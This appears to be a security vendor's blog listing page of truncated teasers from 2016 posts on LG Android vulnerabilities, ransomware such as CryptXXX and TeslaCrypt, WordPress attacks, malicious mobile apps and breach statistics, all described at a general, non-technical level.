OEMs Have Flaws Too: Exposing Two New LG Vulnerabilities

 
Check Point disclosed today two vulnerabilities (CVE-2016-3117, CVE-2016-2035) which can be used to elevate privileges on LG mobile devices to attack them remotely at the LayerOne 2016 conference in Los Angeles. LG issued fixes for both vulnerabilities which Check Point made LG aware of before disclosing them publicly. These vulnerabilities are unique to LG devices which account for over 20% of the Android OEM market in the US, according to a 2016 survey. The first vulnerability allows a malicious app installed on an LG device to abuse the lack of bind permissions in an LG service and to elevate its privileges, allowing additional control of the device. The second vulnerability ...

Check Point Named a Leader in the 2016 Gartner Magic Quadrant for Enterprise Network Firewalls

 
Today’s enterprise networks are more complex than ever. Cloud computing, floods of connected devices and highly mobile workforces put a ton of pressure on security teams to keep networks and data protected. At the same time, the tools and techniques used by cybercriminals to target enterprise data continues to rapidly evolve. When reflecting on the state of enterprise security, I often quote the philosopher Heraclitus who said it best, “The only thing that is constant is change.”   This begs the question: Why is the firewall still part of the network security discussion? There are some in the security industry who view the firewall as antiquated technology. After all, the ...

Attacks on SMB are a sure thing, according to the latest Verizon report

 
It’s not surprising that small businesses are much more vulnerable to cyberattacks vs. large enterprises. The 2016 Data Breach Investigations Report reveals just how much (Check Point contributed to the report). The report covers a large number of SMBs. 521 small businesses were surveyed and 447 confirmed they suffered a security breach with data loss in 2015, an astonishing 85% breach rate. On the other hand, enterprise security breaches tell us a different story. Out of 47,408 enterprises, only 312 (0.6%) experienced such breaches. This is no coincidence. Compared to SMBs, enterprises are much more aware and prepared to face cyberattacks. They implement various security measures and ...

CryptXXX Ransomware: Simple, Evasive, Effective

 
CryptXXX emerged a few weeks ago and it’s been sneaky! It’s most impressive feature is the simplicity of its evasion techniques, which are giving it an advantage over most security systems. This has resulted in a very low detection rate for new samples and a high success rate on the malware’s part. According to the decryption messages and deployment method, both propagate by Angler Exploit Kit, CryptXXX seems very similar to TeslaCrypt, but it’s different in essence. Figure 1 - CryptXXX HTML message Figure 2 - TeslaCrypt Ransom Note Figure 3: CryptXXX Ransom Note – containing the same text   Whether or not the developers are related, they have learned a ...

Spam-Riding Dropper Packs a One-Two Ransomware, Adware Punch

 
The Most Trusty Attack Vector Shady random strangers on the internet often have an uncanny ability to make you believe that you should have expected to hear from them. You may be savvy enough to brush off the ‘Nigerian Prince in Distress’ and the ‘Thousands of Hot Singles in Your Area Waiting to Meet You’ - but what about your invitation to stand trial or the outstanding fine that you owe? Do you brush those off with the same knowing smirk, or is there an opening there that could catch you off-guard? If your honest answer contains a little bit of column B, you are not alone.  Social engineering attacks enjoy a natural advantage against most kinds of security mechanisms. It must ...

Weaponized WordPress Tools

 
WordPress is a free, open source content management system (CMS) for creating websites, and is considered to be the most popular blogging system in use. WordPress' appeal to website developers stems from its  free plugins and themes that are easily installed over the basic platform. These add-ons allow WordPress users to personalize and expand their websites and blogs. There are currently over 60 million WordPress websites worldwide.   Why Target WordPress? The availability of the platform’s code and its popularity make WordPress sites appealing targets for hacking and exploitation. In the past year, we have seen many WordPress attacks. One example is the April 2016 ...

Hack In The Box: Malware Disguises Itself To Infiltrate Your Device

 
No user would intentionally allow malware onto a mobile device, so it’s obvious why malicious apps disguise themselves to trick users into inviting them in. In many cases, malware tries to persuade the user into going even further by asking for various permissions that can enable malicious actions. Malware tries to do as much damage as possible. One of the strategies attackers use to do that is repackaging well-known popular apps. These usually keep their original functionality but add malicious components. The fake copy of the app will have an almost identical name to the original app and seemingly authentic icons, screenshots, and even user reviews. These components can vary in ...

TeslaCrypt Ransomware Shuts Down: One Down, Plenty to Go

 
In a surprising turn of events, the creators of the notorious TeslaCrypt ransomware shut down their operation and revealed the master key for decrypting all files. They even said they are sorry, as displayed in the image below. Figure 1: TeslaCrypt Shut Down Message   The motive behind this step remains unclear. The attackers could be trying to lower their profile to avoid law enforcement agencies or they could really be sorry for the damage they have done. Either way, the users who were infected by TeslaCrypt have already payed the price. As we have reported earlier, TeslaCrypt, which emerged in 2015, was known especially for its ability to adapt. Several versions of it ...

The Scripting Threat: How Admin Tools Became Dominant in the Malware Attack Lifecycle

 
Malware have increasingly adopted scripts as a major technique, replacing file-based execution. This transition took place mainly to avoid signature-based detection employed by many security vendors. To understand how this is achieved, one must first understand what scripting really is. Scripting languages are programs that support automated execution of tasks, which could be executed manually by a human operator. Scripting languages like PowerShell and VBScript were created to provide more flexible capabilities, adaptable to different needs, and are used mainly by administrators. Activities such as victim recognition, lateral movement, C&C communication and persistence are very ...

In The Wild: Malware in Google Play is as Prevalent and Pesky as Ever

 
Not a week passes without new malware found on Google Play and this week was no different. Among the malware found are both new and old samples, including a known malicious banker and a new type of malware making its first appearance on Google Play. Also, Google has patched more vulnerabilities, which is no coincidence since we’ve come to expect frequent security patches and malware discoveries because of the frail security Android provides. Using Wi-Fi to Hack Into Your Device Among the various security patches recently released by Google, one, in particular, catches the eye. The vulnerability allowed attackers to elevate privileges or even to target a device with a Denial-of-Service ...